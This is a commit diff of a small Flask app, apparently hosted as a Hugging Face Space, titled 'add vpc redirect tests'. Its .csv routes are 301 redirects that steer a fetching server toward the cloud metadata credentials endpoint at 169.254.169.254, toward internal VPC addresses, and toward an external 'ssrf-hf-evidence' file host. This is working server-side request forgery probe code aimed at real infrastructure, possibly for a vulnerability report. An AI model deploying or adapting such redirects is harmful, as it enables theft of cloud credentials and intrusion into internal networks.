Spaces:
Sleeping
Sleeping
add vpc redirect tests
Browse files
app.py
CHANGED
|
@@ -2,18 +2,26 @@ from flask import Flask, redirect
|
|
| 2 |
app = Flask(__name__)
|
| 3 |
|
| 4 |
@app.route("/data.csv")
|
| 5 |
-
def
|
| 6 |
return redirect("https://filebin.net/ssrf-hf-evidence-1777003694/evidence.csv", code=301)
|
| 7 |
|
| 8 |
@app.route("/imds.csv")
|
| 9 |
-
def
|
| 10 |
return redirect("http://169.254.169.254/latest/meta-data/iam/security-credentials/", code=301)
|
| 11 |
|
| 12 |
@app.route("/http_test.csv")
|
| 13 |
-
def
|
| 14 |
-
# Test if https->http redirect is followed (httpbin returns json not csv)
|
| 15 |
return redirect("http://httpbin.org/anything/evidence.csv", code=301)
|
| 16 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 17 |
@app.route("/health")
|
| 18 |
def health():
|
| 19 |
return "ok", 200
|
|
|
|
| 2 |
app = Flask(__name__)
|
| 3 |
|
| 4 |
@app.route("/data.csv")
|
| 5 |
+
def redirect_filebin():
|
| 6 |
return redirect("https://filebin.net/ssrf-hf-evidence-1777003694/evidence.csv", code=301)
|
| 7 |
|
| 8 |
@app.route("/imds.csv")
|
| 9 |
+
def redirect_imds():
|
| 10 |
return redirect("http://169.254.169.254/latest/meta-data/iam/security-credentials/", code=301)
|
| 11 |
|
| 12 |
@app.route("/http_test.csv")
|
| 13 |
+
def redirect_http():
|
|
|
|
| 14 |
return redirect("http://httpbin.org/anything/evidence.csv", code=301)
|
| 15 |
|
| 16 |
+
@app.route("/vpc10.csv")
|
| 17 |
+
def redirect_vpc10():
|
| 18 |
+
# Try internal VPC 10.x range - Space's x-proxied-host shows 10.112.x.x range
|
| 19 |
+
return redirect("http://10.112.0.1/evidence.csv", code=301)
|
| 20 |
+
|
| 21 |
+
@app.route("/vpc172.csv")
|
| 22 |
+
def redirect_vpc172():
|
| 23 |
+
return redirect("http://172.20.0.1/evidence.csv", code=301)
|
| 24 |
+
|
| 25 |
@app.route("/health")
|
| 26 |
def health():
|
| 27 |
return "ok", 200
|